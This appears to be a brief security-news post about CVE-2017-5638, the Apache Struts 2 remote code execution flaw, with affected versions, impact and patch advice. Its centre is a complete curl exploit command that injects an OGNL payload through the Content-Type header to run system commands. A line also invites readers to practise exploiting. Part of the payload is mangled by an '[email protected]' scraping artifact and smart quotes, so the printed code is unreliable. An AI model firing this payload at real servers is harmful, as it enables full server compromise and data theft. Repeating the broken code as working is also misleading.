Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a server processing file uploads. The underlying vulnerability exists because the parser inaccurately evaluates the Object-Graph Navigation Language (OGNL) expressions contained within this header during an exception or error state. Instead of treating the header value as a simple string, the flawed exception handling mechanism passes it directly to the OGNL interpreter. OGNL is a powerful expression language integrated with Struts that can execute Java code and access the application’s context. Consequently, an attacker can inject and execute arbitrary OGNL expressions, which the server will then evaluate, leading to full system command execution on the underlying server with the same privileges as the Struts application process.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How Exploit:
Craft malicious Content-Type header containing OGNL payload. Send HTTP request with malicious header to Struts endpoint. OGNL expression executes system commands on server. Attacker gains remote shell access.
Protection from this CVE
Apply official patch. Upgrade Struts to version 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Disable unused file upload functionality.
Impact:
Arbitrary system command execution. Complete server compromise. Data breach and theft. Unauthorized access to internal networks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
